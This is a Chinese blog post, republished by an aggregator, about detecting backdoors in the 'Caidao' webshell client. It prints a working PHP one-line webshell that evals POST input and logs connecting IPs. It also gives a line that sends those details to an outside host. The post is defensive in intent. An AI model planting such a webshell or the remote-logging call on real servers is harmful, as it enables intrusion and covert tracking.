關(guān)于菜刀后門排查

小杰哥 (能學(xué)則學(xué)，技多不壓身。) | 2016-03-08 14:56

最近菜刀后門被爆出來后??大家都在尋找沒有后門的菜刀

可是…

人家說沒后門??你卻不知道是否真的沒有后門(除非自己抓下包或者反編譯看看)

去年的時(shí)候菜刀后門事件被爆 可沒有現(xiàn)在那么火熱

我也在挺早的時(shí)間查了一下自己的菜刀??確實(shí)有發(fā)現(xiàn)請(qǐng)求，不過現(xiàn)在去掉了

可是…??記得前段時(shí)間看到一篇文章 連上菜刀不發(fā)包??但是你做操作的時(shí)候才發(fā)包 這個(gè)也有遇到過..

于是… 還是被爆菊

我和大家分享一下我是如何發(fā)現(xiàn)菜刀是否存在后門的

我稍微修改了一句話木馬??從而使他連接會(huì)記錄連接者的IP

代碼:

header("Content-type:text/html;charset=utf-8");

if(!empty($_POST['t'])){

$t = fopen("1.txt","a+");

fwrite($t,"Hakcer IP: ".@$_SERVER['REMOTE_ADDR']." Hacker Name: ".@$_SERVER['REMOTE_HOST']." Hacker Prot: ".@$_SERVER['REMOTE_PORT']."\r\n");

eval($_POST['t']);

}

?>

1.txt 是在馬的目錄下的?? 各位可自行修改為遠(yuǎn)程發(fā)送

file_get_contents("http://www.t0n9.com/1.php?i=".@$_SERVER['REMOTE_ADDR']."&n=".@$_SERVER['REMOTE_HOST']."&p="@$_SERVER['REMOTE_PORT']);

這個(gè)有點(diǎn)守株待兔的感覺

到現(xiàn)在為止我博客的一句話都沒有人連…

拋磚引玉，希望各位共享一下自己排查后門的方法與姿勢(shì)！

總結(jié)

以上是生活随笔為你收集整理的菜刀php后门,关于菜刀后门排查的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。